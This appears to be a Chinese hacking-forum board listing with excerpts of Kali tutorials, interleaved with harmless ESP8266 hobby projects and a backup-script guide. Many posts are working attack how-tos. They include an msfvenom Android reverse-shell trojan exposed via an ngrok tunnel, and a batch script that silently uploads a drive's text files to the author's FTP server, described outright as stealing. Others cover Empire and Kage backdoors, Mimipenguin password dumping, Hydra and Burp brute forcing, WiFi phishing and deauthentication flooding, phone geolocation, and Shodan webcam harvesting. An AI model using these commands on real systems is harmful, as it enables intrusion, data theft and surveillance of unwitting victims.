建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
364个主题在此版面
-
ArmitageArmitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。 启动 启动后如图所示!如果提示错误,请提前开启postgresql 对目标进行扫描对于目标的扫描,我们可以用Nmap或Msf进行扫描! 如图,我们扫描到了局域网内的一些设备 有windows设备,有打印机,有linux设备 这时,我们可以针对一台设备进行扫描。 可以看到,当前设备开启的端口。 开始攻击右键选择Scan,Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步确定攻击方法提供参考依据: 成功之后我们会发现设备的图标会发生变化 当然我们也可以用系统给出的各种exp进行攻击!
-
- 0 篇回复
- 15 次查看
-
-
-
题记本篇文章写个徘徊在刚学习kali的小伙伴。本文将从以下几个方面写起,命令篇,神器篇,渗透测试篇,三个方面讲起。若还有哪些方面没有涉及到,大家在下方留言即可,方便我补充!本文作者逍遥子原创作品,如需转载请先联系作者,同意后方可转载。同时你可以加入QQ交流群:(618207388)或者关注微信公众号kali黑客教学或者kali论坛同步更新!何为kali linuxKali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。 Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. kali安装U盘安装虚拟机安装(推荐)物理机安装树莓派(装逼界的上乘设备) kali安装(vm)配置内存2G(最小)硬盘(20-40G)无线网卡(推荐8187)处理器4核 kali 可以安装图形界面,也可以只用命令行界面。这个根据你的实际情况来看,如果你的设备比较高端,建议安装图形界面,如果设备不高端,建议安装命令界面如树莓派建议安装命令界面。不然图形界面会占用很大的资源。需要注意的是,在kali中两种界面是可以相互切换的。 参考文章: kalilinux的图形界面和文本界面的切换…
-
- 0 篇回复
- 35 次查看
-
-
Mimipenguin beta-2.0A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text DetailsThis version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. 项目地址: 链接
-
- 0 篇回复
- 28 次查看
-
-
Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap sc…
-
- 0 篇回复
- 19 次查看
-
-
配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。 远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可! 填写完后效果如下: 然后点击开通 下载客户端根据你kali的版本下载 我的是64位的。 运行客户端先看看你的clientid 在隧道管理——隧道ip中查看,如图: 记录好id后,运行下面命令 ./sunny clientid 你的id 查看外网的ip我们ping下赠送域名的ip地址 得到ip地址 制作外网shellmsfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。 生成之后,配置msf msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 内网ip set LPORT 内网端口 exploit填坑: 生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要) 完成后,手机连接4G网络,运行木马。成功得到shell 看看手机的ip地址 [dplayer url="http://js.bbskali.cn/ji.flv" …
-
- 0 篇回复
- 13 次查看
-
-
活生生的硬是把十几块钱的板子,变成了路由器。清单esp8266板子一个软件ESP8266Flasher 说明:先下载刷入的固件 esp8266 wifi中继固件 固件中0x00000.bin烧写到0x00000地址处,0x10000.bin文件烧写到0x10000地址处。 如图所示: 刷入完成后,会出现MYAP的ssid 连接后访问 192.168.4.1 进行配置 网速测试 优点和缺点 优点: 小巧方便,简单实用,最主要的是便宜哈~ 缺点: 效率低,容易掉线,网速慢。
-
- 0 篇回复
- 16 次查看
-
-
之前有说过Linux VPS每日自动备份FTP及数据库通过邮箱发送方法,不过需要自建FTP空间才行,较本教程有点麻烦,如果你没有FTP空间,可以申请一个七牛云存储,免费10G空间备份一般的小站足够了。这里介绍一个备份网站文件和数据库到七牛的脚本,实测效果还不错,Linux vps下弄个定时任务就可以每天定时自动备份了。本脚本Github项目地址:https://github.com/ccbikai/backuptoqiniu 先去注册个七牛云账号,然后实名认证后,会送10G流量和空间。注册完后,在左侧位置找到对象存储,然后新建存储空间,并记住你新建的存储空间的名称,后面需要用到。 方法注意:系统python版本得在2.7以上 1、安装zipapt-get install zip注意:centos命令为 yum install zip2、安装备份脚本wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip unzip backuptoqiniu.zip && cd backuptoqiniu python setup.py install3、编辑配置文件使用vi backuptoqiniu.sh命令或者Winscp工具编辑 ##备份配置信息 ## #备份名称,用于标记 BACKUP_NAME="backup" #备份目录,多个请空格分隔 BACKUP_SRC="/home/www…
-
- 0 篇回复
- 12 次查看
-
-
前言前不久有这样一个想法,就是自动运行一个脚本,上传PC里面的文件到我们自定的服务器。比如我们可以指定 上传U盘里面所有的word文档到我们的服务器,已达到窃取的目的。那么来看看是如何实现的吧!代码@Echo Off Echo open 服务器ip >ftp.up Echo 用户名>>ftp.up Echo 密码>>ftp.up Echo binary>>ftp.up Echo prompt>>ftp.up Echo lcd "E:\*.txt">>ftp.up Echo mput "E:\*.txt">>ftp.up Echo bye>>ftp.up FTP -s:ftp.up del ftp.up /q使用将文件代码另存为.bat文件,双击运行后会将E盘中的所有的txt文件上传到我们指定的服务器。
-
- 0 篇回复
- 18 次查看
-
-
设备清单esp8266开发板oled (0.96)杜邦线 设备电路图 添加库u8g2库文件 项目一 Hello World/* HelloWorld.ino esp8266+oled项目实例 论坛:bbskali.cn 博客:blog.bbskali.cn */ #include <Arduino.h> #include <U8g2lib.h> #ifdef U8X8_HAVE_HW_SPI #include <SPI.h> #endif #ifdef U8X8_HAVE_HW_I2C #include <Wire.h> #endif U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // 此处 D1 D2是对应焊接的脚针 void setup(void) { u8g2.begin(); } void loop(void) { u8g2.clearBuffer(); // clear the internal memory u8g2.setFont(u8g2_font_ncenB08_tr); // choose a suitable font u8g2.drawStr(0,10,"Hello World!"); // write something to…
-
- 0 篇回复
- 16 次查看
-
-
Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~
-
- 0 篇回复
- 13 次查看
-
-
设备清理esp8266开发版oled显示屏 电路图 这里我们使用GFX库来解决图片输入的问题。 牛刀小试,我们先输入文字试试display.setTextSize(1); // setTextSize applique est facteur d'échelle qui permet d'agrandir ou réduire la font display.setTextColor(WHITE); // La couleur du texte display.setCursor(0,0); // On va écrire en x=0, y=0 display.println("Hello, world!"); // un println comme pour écrire sur le port série display.setTextColor(BLACK, WHITE); // On inverse les couleurs, le fond devient noir display.println("Hello, world!"); // Vous pouvez changer à la volée de Font (pour cela vous devez la déclarer comme une librairie en début de projet, par exemple #i…
-
- 0 篇回复
- 15 次查看
-
-
清单esp8266开发版继电器(用去控制220v家庭电路),本实例用LED灯代替。电洛铁 焊锡 电线若干 电路图 实例代码#include <ESP8266WiFi.h> #include <WiFiClient.h> #include <ESP8266WebServer.h> #include <ESP8266mDNS.h> const char* ssid = "PDCN"; const char* password = "1234567890"; ESP8266WebServer server(80); String html = "<!DOCTYPE html><html lang=\"en\"><head><meta charset=\"UTF-8\"><title>Priess的小灯</title><body><a href=\"./pin?light=on\"><input type=\"button\" value=\"on\"></a> <a href=\"./pin?light=off\"><input type=\"button\" value=\"off\"></a></body></head></html>"; void pin(){ if(server.arg…
-
- 0 篇回复
- 17 次查看
-
-
所需库ArduinoJson.hOLED.h 若提示没有ESP8266WiFi.h库,请选择你的开发版即可。 库下载: Arduinojson.h Oled库 将库下载后放到Arduino的libraries目录下 代码#include <ESP8266WiFi.h> #include <ArduinoJson.h> #include <Wire.h> #include "OLED.h" static const char logo[] PROGMEM={ 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0x7f,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0xff,0x03,0x00,0xf0,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0x7f,0x00,0x00,0x80,0xff,0xff,0xff,0xff,0xff,0xff,0x7f, 0xff,0xff,0xff,0xff,0xff,0…
-
- 0 篇回复
- 17 次查看
-
-
hydra(thc hydra)是一个在线密码攻击工具。它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。hydra支持30+协议,包括支持SSL的协议。它通过使用用户列表和单词列表来指定服务上的攻击。hydra工作模式有4种:一个用户名和一个密码用户列表和一个密码一个用户名和密码列表用户列表和密码列表使用终端输入命令xhydra启动图形界面,当然也可以用hydra来启动命令行界面。 设置攻击目标和攻击服务 设置用户名字密码字典 设置超时 开始攻击
-
- 0 篇回复
- 16 次查看
-
-
脚本参数SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts --script-args-file=filename: provide NSE script args in a file --script-trace: Show all data sent and received --script-updatedb: Update the script database. --script-help=<Lua scripts>: Show help about scripts. <Lua scripts> is a comma-separated list of script-files or script-categories. -sC 是指的是采用默认配置扫描,与--script=default参数等价 具体调用的函数列表包括 default NSE Category(https://nmap.o…
-
- 0 篇回复
- 17 次查看
-
-
安装git clone https://github.com/Viralmaniar/I-See-You.git cd I-See-You chmod u+x ISeeYou.sh ./ISeeYou.sh 输入图中框出来的URL地址之后,按下回车键: 手机访问刚才的网址 我们就可以获得手机的一些信息 比如定位:
-
- 0 篇回复
- 13 次查看
-
-
漏洞介绍File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击着会指定一个“意想不到”的文件让包含函数去执行,从而造成恶意操作。 根据不同的配置环境,文件包含漏洞分为如下两种情况: 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。 2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。 因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。 你可以通过“File Inclusion”对应的测试栏目,来进一步的了解该漏洞。 本地文件包含漏洞我们在网站的根目录新建一…
-
- 0 篇回复
- 12 次查看
-
-
在前面的教程中,我们提到过利用Fluxion等工具进行WiFi钓鱼,从而来获取WiFi密码,但是这种方法也是有弊端的,比如谁没事干老哪个破电脑干坏事,今天我们来说说如何利用esp8266来进行WiFi钓鱼。准备esp8266板子 刷入固件方法和上篇文章提到的一样,参考文章《esp8266刷入固件》 固件下载 上传web到esp8266安装完后打开工具——开发板——开发板管理器,此时会自动更新,过个数分钟更新完毕后(当然,如果用外网的话可能几秒钟就能解决),搜索eps8266,选择第二个,版本选2.2.0,然后安装。 前面提到过,不再说了。麻烦,具体细节请看历史文章。 将上面解压后的web源码上传工具的tools放到Arduino根目录里合并,然后返回以下界面,点击文件——新建,新建一个项目,将里面的代码清空,然后点击文件——保存,将项目保存到一个你能找到的位置,点击工具——esp8266 sketch data upload,会出现以下的提示,选择No,会发现新建的项目中多出来一个data文件夹,里面是空的,然后将上面下载的web源码\data里面的三个文件复制到这个文件夹里面。 PS: 工具菜单下没有esp8266 sketch data upload,在Arduino根目录下新建tool文件夹,将下面文件解压后放到里面即可。 esp8266 tool文件 将附件放到项目文档的date文件中 web附件下载 sketch data upload,这时不会出现提醒,开始上传web页面,等个1分钟左右esp8266上的蓝灯不闪烁了…
-
- 0 篇回复
- 13 次查看
-
-
登录在浏览器中输入ip地址192.168.4.1 视频演示 使用教程 扫描网络 伪造ssid点击ssids添加WiFi名称 开始攻击 效果如下: 洪水攻击设备正常断网 参考文档esp8266环境搭建 esp8266固件刷入
-
- 0 篇回复
- 15 次查看
-
-
打开平台pikachu,点击token方爆破选项。随便输入账号和密码,并且用burp抓包。 我们利用以前破解的方式进行破解,提示如下! username=6666&password=666666&token=679625cb843f4ba37e630426334&submit=Login我们发现多了一个字段token=679625cb843f4ba37e630426334,抱着试一试的心态,我们按照原来的方式破解。 很遗憾,并没有跑出密码。 抽根烟 压压惊 我们按F12审查元素 表单中有一个hidden项,里面存的就是token。 如何破 开启burpsuite代理,抓取数据包。将请求包转送到Intruder(在内容处右键菜单中可以看到)。Attack type选择Pitchfork。将passwod和user_token设置攻击位置(attack position) 在options栏找到Grep - Extract,点击Add。 点击Refetch response,进行一个请求,即可看到响应报文,直接选取需要提取的字符串,上面的会自动填入数据的起始和结束标识。 点击“OK”返回,可以在列表中看到一个grep项。 返回payloads栏,payload 1 设置密码字典,payload 2 选择payload type为“Recursive grep”,然后选择下面的extract grep项即可。 然后 点击Start attack开始攻击,攻击成功 666666.png burp下载 …
-
- 0 篇回复
- 16 次查看
-
-
登录数据库,并创建数据库student 创建数据库命令 create database student创建两个表student,和score即学生表和成绩表。 student表的字段有id,name,class,number score表中的字段有number,chinese,math,english 创建表 create table student(`id` int(4),`name` char(40),`class` char(40),`number` char(40)); create table score(`number` char(40),`chinaese` char(40),`math` char(40),`english` char(40)); 当前的表 写入测试数据 insert into student(id,name,class,number) values('1',"张三","一班","201901"); insert into student(id,name,class,number) values('2',"令狐冲","二班","201902"); insert into student(id,name,class,number) values('3',"张三丰","三班","201903"); insert into student(id,name,class,number) values('4',"娜可露露","一班","201904"); insert into score(number,chin…
-
- 0 篇回复
- 11 次查看
-
-
介绍昨天在github中看到一个项目,觉得有点意思,在这里写份教程。Empire一款基于PowerShell的后渗透测试工具。安装 git clone https://github.com/EmpireProject/Empire.gitEmpiresetup目录执行install.sh文件 ./install.sh最后设置数据库密码那里可以默认回车,也可以自己设置 踩坑 如果安装途中,遇到网络问题,多次执行./install.sh文件安装全部依赖,运行主目录下empire启动程序前,先执行setup目录下的reset.sh后再执行主目录empire文件。 使用监听(Empire)> listeners 选择监听方式 (Empire: listeners) > uselistener http 查看需要配置的选项Empire: listeners/http) > info 设置监听的名字 (Empire: listeners/http) > set Name backdoor (Empire: listeners/http) > set Host http://192.168.80.131:4447 #设置木马反弹回连地址 (Empire: listeners/http) > set Port 4447 #设置本地监听端口 Empire: listeners/http) > execute #执行监听 至此,监听工作完成。我们开始配置生成后门。 生…
-
- 0 篇回复
- 14 次查看
-
-
基于servier端1.首先尝试输入错误的用户名,密码,验证码。返回验证码不正确 2.输入错误的用户名密码,输入正确的验证码。返回用户名或者密码不正确 8 3.输入错误的用户名密码,不输入验证码返回验证码不能为空 然后刷新页面,会生出新的验证码。 可以发现服务器对验证码的有效性做过校验,一切逻辑正常。 但是如果这个验证码在后台长期不过期,或者过期时间较长。足够我们去爆破用户名和密码,那么就会产生漏洞。 1.输入错误的用户名和密码,然后输入正确的验证码。 然后将包发送到repeater模块中 注意:如果提示密码错误,请刷新页面。获取新的验证码即可。 然后添加到intruder 设置参数 跑出结果即可。 client端不安全的验证码——on client(只在前端处理)绕过 步骤: 1、打开burp suite,打开PHP study,打开Pikachu,点击on client选项 2、输入一次正确的验证码,随意输入账号密码,进行抓包。 抓包 选中,右键发送至repeater 4、点击raw,随意改一下验证码,点击“go”,若出现用户名或密码错误,而不是验证码错误,则验证码只在前端处理,将地址发到intruder,直接暴力破解,无需考虑验证码。 看,这里提示是用户名和密码错误,而不是验证码错误。 也就是说,前端的这个js验证码就是吓唬人的。 <script language="javascript" type="text/javascript"> var code; //在全局 定义验证码 funct…
-
- 0 篇回复
- 11 次查看
-
-
启动msfmsfconsole配置参数use auxiliary/gather/shodan_search获取shodan aip登录shodan 点击show api key 返回msf配置参数 set SHODAN_APIKEY you api key set QUERY "webcamXP" run可以看到我们已经收集了很多的暴露在公网的ip地址,我们随便打开。
-
- 0 篇回复
- 13 次查看
-